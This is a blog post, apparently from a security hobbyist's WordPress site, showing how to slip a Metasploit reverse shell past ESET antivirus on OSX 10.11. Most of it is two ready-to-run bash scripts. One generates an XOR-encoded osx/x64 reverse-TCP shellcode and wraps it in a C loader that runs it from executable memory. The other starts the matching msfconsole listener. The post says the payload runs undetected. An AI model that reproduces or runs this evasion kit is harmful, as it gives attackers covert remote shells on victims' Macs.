Bypassing antivirus on OSX 10.11 with Metasploit – ESET

Next in line for the tests is ESET. There is no free version, so we are stuck with a trial which you can download from https://www.eset.com/int/home/cyber-security/

TL;DR we can get the same code executed fine like with Avast with our custom payload  https://astr0baby.wordpress.com/2017/07/13/bypassing-antivirus-on-osx-10-11-with-metasploit-avast/

However this time ESET detected the test file EICAR.COM on the SMB share, which Avast did not for some reason …

I have ran the standard test scenarios like in the previous article and all the payloads got detected the same way as Avast.

So again we try the custom source code template and the shellcode as shown here

Here is a generator for the above to make life easier .. OSX-x64-payload-generator.sh

#!/bin/bash
clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For OSX 64bit Antivirus bypass (Avast) " 
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Checking if metasploit msfvenom is present..'
if [ -x ./msfvenom ]; then
echo '[*] Found msfvenom in current path ........ good'
else
 echo '[-] No msfvenom in path...make sure you have this script in your metasploit-framework path'
exit 0
fi 
echo '[*] Cleaning up ' 
rm -f osx64-payload.c
./msfvenom -p osx/x64/shell_reverse_tcp EXITFUNC=process LHOST=$IP LPORT=$port -a x64 --platform OSX -e x64/xor -f c -o test.c
echo "#include <stdio.h>" > temp.c 
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/ipc.h>' >> temp.c
echo '#include <sys/msg.h>' >> temp.c
echo '#include <string.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <fcntl.h>' >> temp.c
echo '#include <sys/socket.h>' >> temp.c
echo '#include <stdlib.h>' >> temp.c
echo '#include <errno.h>' >> temp.c
echo '#include <sys/mman.h>' >> temp.c
echo '#include <sys/types.h>' >> temp.c
echo '#include <sys/stat.h>' >> temp.c
echo '#include <sys/ioctl.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <strings.h>' >> temp.c
echo '#include <unistd.h>' >> temp.c
echo '#include <poll.h>' >> temp.c
echo '#include <pthread.h>' >> temp.c 
echo '#include <stdint.h>' >> temp.c 
echo '' >> temp.c 
cat test.c >> temp.c 
echo '' >> temp.c
echo 'int main(int argc, char **argv)' >> temp.c
echo '{' >> temp.c
echo 'void *ptr = mmap(0, 0x1000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);' >> temp.c
echo 'printf("ret: 0x%x",ptr);' >> temp.c
echo 'memcpy(ptr,buf,sizeof buf);' >> temp.c
echo 'void (*fp)() = (void (*)())ptr;' >> temp.c
echo 'fp();' >> temp.c
echo '' >> temp.c
echo '}' >> temp.c
mv temp.c osx64-payload.c
if [ -f ./osx64-payload.c ]; then
echo '[*] osx64-payoad.c generated ...'
ls -la osx64-payload.c
else
 echo '[-] Something went wrong .. '
exit 0
fi

And the listener LISTENER-MAC-LATEST.sh

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD osx/x64/shell_reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

Here we are compiling and executing the custom code against ESET

Lets try some other AVs next..

 

 

 

Advertisements
Gallery | This entry was posted in Uncategorized. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s